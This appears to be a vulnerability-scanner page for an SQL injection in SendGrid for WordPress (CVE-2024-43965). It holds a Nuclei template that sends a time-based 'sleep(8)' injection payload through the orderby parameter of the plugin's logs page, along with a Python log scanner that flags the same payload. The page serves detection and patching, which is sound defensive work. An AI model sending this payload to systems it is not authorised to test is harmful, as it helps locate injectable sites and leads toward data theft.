SendGrid for WordPress <= 1.4 - SQL Injection
CVE-2024-43965
Verified
Description
Smackcoders SendGrid for WordPress (affected versions 1.4 and below) contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries; exploitation requires crafted input.
Severity: Critical
CVSS Score: 9.8
Exploit Probability: 18%
Published Date: February 18, 2026
Template Author: Shivam Kamboj
CVE-2024-43965.yaml
id: CVE-2024-43965

info:
  name: SendGrid for WordPress <= 1.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Smackcoders SendGrid for WordPress [affected versions 1.4 and below] contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of SendGrid for WordPress, version 1.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43965
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-sendgrid-mailer/sendgrid-for-wordpress-14-unauthenticated-sql-injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43965
    epss-score: 0.18426
    epss-percentile: 0.95323
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-sendgrid-mailer,unauth

flow: http(1) && http(2)

http:
  # Step 1: authenticate; the blank line separates HTTP headers from the form body.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  # Step 2: time-based check on the logs page; a response delayed by >= 8s confirms the injection.
  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(8)))a)&order=asc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration >= 8'
          - 'contains_all(body, "wp-mailplus", "SendGrid")'
        condition: and
# digest: 4a0a00473045022100c45eb661646fa54b52d888f0cea080737dca1a674f48dc2e966b0497f979e86f02202a5deb981f67a1921871bcfd5373cff87363a7bcb359c935dc12fd46a08c883f:922c64590222798bb761d5b6d8e72950
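The template confirms the flaw by timing a probe placed in the plugin's orderby parameter on the wp-mailplus-logs admin page. As an added defender-side example (not part of the Nuclei template or of the plugin), the following Python scans constructed Apache-style access-log lines for that request shape, flagging any orderby/order value on that page which is not a bare column name; the log lines, IPs and timestamps are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines (not real traffic): a legitimate
# sort request, the probe shape from the template's second request, and an
# unrelated request that the page filter must ignore.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Feb/2026:10:00:01 +0000] "GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time&order=desc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Feb/2026:10:00:07 +0000] "GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(8)))a)&order=asc HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.9 - - [18/Feb/2026:10:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate sort parameter is a bare column name (or asc/desc); anything
# else had to be crafted, which is what CWE-89 in this parameter looks like.
SAFE_SORT = re.compile(r"[A-Za-z0-9_]+")


def classify_sort_value(value: str) -> "str | None":
    """Reason a sort value is suspicious, or None when it is a bare identifier."""
    if SAFE_SORT.fullmatch(value):
        return None
    if "sleep(" in value.lower():
        return "time-based blind SQL injection probe"
    return "non-identifier sort value"


def scan_access_log(text: str) -> list:
    """Findings for wp-mailplus-logs requests whose orderby/order was crafted."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # also decodes %2c
        if query.get("page") != ["wp-mailplus-logs"]:
            continue
        for param in ("orderby", "order"):
            for value in query.get(param, []):
                reason = classify_sort_value(value)
                if reason:
                    findings.append({"ip": m["ip"], "ts": m["ts"], "param": param,
                                     "value": value, "reason": reason})
    return findings
```

Pair the findings with the server's response time, as the template's duration matcher does, to separate a successful delay from a blocked or errored request.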
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2024-43965
CWE ID: CWE-89
Remediation Steps
Update to the latest version of SendGrid for WordPress, version 1.5 or later.